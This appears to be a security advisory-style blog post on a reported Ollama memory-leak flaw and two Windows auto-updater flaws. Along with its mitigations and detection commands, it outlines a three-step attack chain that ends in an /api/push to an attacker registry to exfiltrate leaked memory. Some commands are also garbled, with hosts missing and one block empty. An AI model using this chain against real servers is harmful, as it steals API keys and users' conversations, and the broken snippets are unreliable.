CVE-2026-7482 & Windows Ollama Flaws: Three Unauthenticated API Calls Leak Your Entire AI Server's Memory While Auto-Updaters Plant Persistent Backdoors + Video

Introduction:

A critical heap out‑of‑bounds read vulnerability, tracked as CVE‑2026‑7482, affects Ollama versions prior to 0.17.1. Dubbed “Bleeding Llama,” the flaw allows an unauthenticated remote attacker to leak the entire process memory of an exposed Ollama server—including environment variables, API keys, system prompts, and concurrent user conversation data—by supplying a specially crafted GGUF model file. The attack requires only three unauthenticated API calls to the `/api/create` and `/api/push` endpoints, which upstream distribution does not protect with any authentication. With an estimated 300,000 Ollama servers exposed on the public internet, this vulnerability presents an immediate, mass‑scale threat to AI infrastructure.

Learning Objectives:

Understand the technical root cause of CVE‑2026‑7482, including how a missing bounds check in the GGUF model loader leads to out‑of‑bounds heap reads.
Learn to detect, mitigate, and remediate the vulnerability through network segmentation, authentication proxies, and upgrading to Ollama 0.17.1.
Identify the unpatched Windows auto‑update flaws (CVE‑2026‑42248 and CVE‑2026‑42249) that enable persistent code execution and supply‑chain attacks.

You Should Know:

1. Technical Deep Dive: CVE‑2026‑7482 – “Bleeding Llama”

The root cause lies in Ollama’s GGUF model loader, specifically the `WriteTo()` function in `fs/ggml/gguf.go` and server/quantization.go. When creating a model from a GGUF file, the `/api/create` endpoint accepts an attacker‑supplied file that declares a tensor offset and size far exceeding the file’s actual length. Ollama trusts these declared dimensions and, during the quantization process, reads past the allocated heap buffer – leaking any adjacent memory contents.

Because the leaked memory may contain environment variables (e.g., OPENAI_API_KEY), system prompts, and other users’ conversation data, an attacker can exfiltrate this sensitive information by then pushing the resulting model artifact to an attacker‑controlled registry via the `/api/push` endpoint.

The attack chain is three steps:

1. Upload crafted GGUF file

`POST /api/blobs/sha256:` with a file containing an intentionally oversized tensor shape.

2. Trigger the vulnerability

`POST /api/create` to cause Ollama to process the file, triggering the heap out‑of‑bounds read.

3. Exfiltrate the leaked data

`POST /api/push` with "name": "registry.attacker.com/leaked-model", pushing the corrupted model (now containing leaked heap memory) to an attacker’s registry.

No authentication or credentials are required, and the attack leaves no crash or log entries that would alert the victim.

Step‑by‑Step Guide: Testing for Exposure (Ethical Use Only)

1. Check if your Ollama instance is exposed

From an external machine, run:

bash
curl -s http://:11434/api/tags
[/bash]
If you receive a JSON response listing models, the `/api/tags` endpoint is publicly accessible – a clear indicator that other endpoints, including the vulnerable `/api/create` and /api/push, are also exposed.

2. Verify the version (vulnerable versions are <0.17.1)

bash
curl http://:11434/api/version
[/bash]
If the version is `0.17.0` or lower, the instance is vulnerable.

3. Immediate mitigation

Bind Ollama only to localhost and require authentication:

bash
Stop Ollama, then restart with:
OLLAMA_HOST=127.0.0.1 ollama serve
[/bash]
Alternatively, place Ollama behind a reverse proxy that enforces API key validation on `/api/create` and /api/push.

Unpatched Windows Auto‑Update Flaws (CVE‑2026‑42248 & CVE‑2026‑42249) – Persistent Code Execution
On Windows, Ollama’s update mechanism contains two additional, unpatched vulnerabilities that can be chained to achieve persistent remote code execution.

CVE‑2026‑42248 – Missing signature verification
The Windows build’s update verification routine unconditionally returns success, meaning no digital signature or trust check is performed on downloaded update executables. The macOS version, by contrast, uses proper code‑signing checks.
CVE‑2026‑42249 – Path traversal in update response headers
Ollama’s Windows updater builds local file paths directly from HTTP response headers (e.g., the `ETag` header) without sanitization. An attacker who controls the update response can inject `../` sequences, writing arbitrary executables to a location of their choice, including the Windows Startup folder. Because the signature check never fails, the post‑write cleanup that would remove an unsigned file is never executed.

As Ollama for Windows performs silent automatic updates by default, a malicious payload can be installed automatically without user awareness. The planted executable will run on every subsequent login, providing the attacker with persistent access.

Step‑by‑Step Guide: Detecting and Hardening Windows Instances

1. Check if your Windows Ollama is vulnerable

Versions from 0.12.10 through 0.17.5 are confirmed vulnerable. Run:
bash
ollama –version
[/bash]
If the version falls within that range, assume both the memory leak and the updater flaws apply.

2. Disable automatic updates immediately

bash
Stop Ollama if running
Stop-Process -Name “ollama” -Force

Disable auto-start from Startup folder
Remove-Item “$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\Ollama.lnk” -Force

Alternatively, move the shortcut to a safe location
Move-Item “$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\Ollama.lnk” “$env:USERPROFILE\Desktop\Ollama.lnk.disabled”
[/bash]

3. Block outbound update requests

Add a firewall rule to block Ollama from reaching its update server:
bash
New-NetFirewallRule -DisplayName “Block Ollama Updates” -Direction Outbound -Program “C:\Program Files\Ollama\ollama.exe” -Action Block
[/bash]
Also override the update URL to a non‑existent endpoint by setting the environment variable:
bash
[/bash]

3. Mitigation & Hardening for All Platforms

Because Ollama’s upstream distribution provides no native authentication for its REST API, any network‑accessible instance must be protected by external controls. The following measures should be implemented immediately:

| Mitigation | Command / Configuration | Platform |

|||-|

Step‑by‑Step Guide: Deploying an Authentication Proxy with Traefik

1. Create a `traefik.yml` configuration file:

bash
entryPoints:
web:
address: “:80”
ollama:
address: “:11434”

providers:
file:
filename: dynamic.yml
[/bash]

2. Create `dynamic.yml`:

bash
http:
middlewares:
ollama-auth:
forwardAuth:
address: “http://auth-service:8080/verify”
authResponseHeaders:
– “X-User”

routers:
ollama:
entryPoints:
– ollama
rule: “Host(ollama.internal)”
service: ollama-backend
middlewares:
– ollama-auth

services:
ollama-backend:
loadBalancer:
servers:
– url: “http://127.0.0.1:11434”
[/bash]
3. Start Traefik and point it to your local Ollama instance. Ollama now only answers requests that include a valid `X-API-Key` header verified by the auth service.

4. Detection & Threat Hunting

Given the stealthy nature of the attack (no crashes, no logs), proactive detection relies on network monitoring and anomaly detection.

Linux Detection Commands

bash
Check for unexpected outbound connections to unknown registries
sudo netstat -tunap | grep :11434

Monitor for suspicious files in the model cache
find ~/.ollama/models -type f -exec file {} \; | grep -v “data”

Audit environment variables for exposed secrets
ps eww $(pgrep ollama) | tr ‘ ‘ ‘\n’ | grep -E ‘KEY|SECRET|TOKEN’
[/bash]

Windows Detection Commands (PowerShell)

bash
Check Startup folder for unsigned executables
Get-ChildItem “$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup” | ForEach-Object { Get-AuthenticodeSignature $_.FullName }

Monitor for unusual update activity
Get-WinEvent -FilterHashtable @{LogName=’Application’; ProviderName=’Ollama’} | Where-Object { $_.Message -match “update” }

Check for persisted executables
schtasks /query /fo LIST /v | findstr “Ollama”
[/bash]

5. What Undercode Says

The “local = secure” fallacy is dangerous. Many organizations deploy Ollama believing that local execution inherently guarantees security, yet they expose it to the public internet. Ollama’s default configuration binds to all interfaces and provides no authentication, making every exposed instance an easy target.
The Windows auto‑update chain is a supply‑chain nightmare. With missing signature verification and a path traversal bug, an attacker who compromises the update channel (e.g., via DNS hijacking or MITM) can silently plant a persistent backdoor on every Windows machine running Ollama. That backdoor will survive reboots and remain undetected because no Mark‑of‑the‑Web tag is applied.

Prediction:

As AI adoption accelerates, the gap between rapid deployment and security hardening will be increasingly exploited. The Ollama vulnerabilities are not an isolated incident – they represent a class of weaknesses common to many emerging AI toolchains that prioritize ease‑of‑use over security. Expect to see more memory‑corruption bugs in GGUF parsers and path traversal flaws in auto‑updaters across the AI ecosystem over the next 12–18 months. Organizations should now adopt a “zero trust for AI infrastructure” posture, treating every LLM serving endpoint as an untrusted boundary requiring authentication, network segmentation, and continuous monitoring.

▶️ Related Video (68% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Hackermohitkumar Cve – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky

Listen to this Post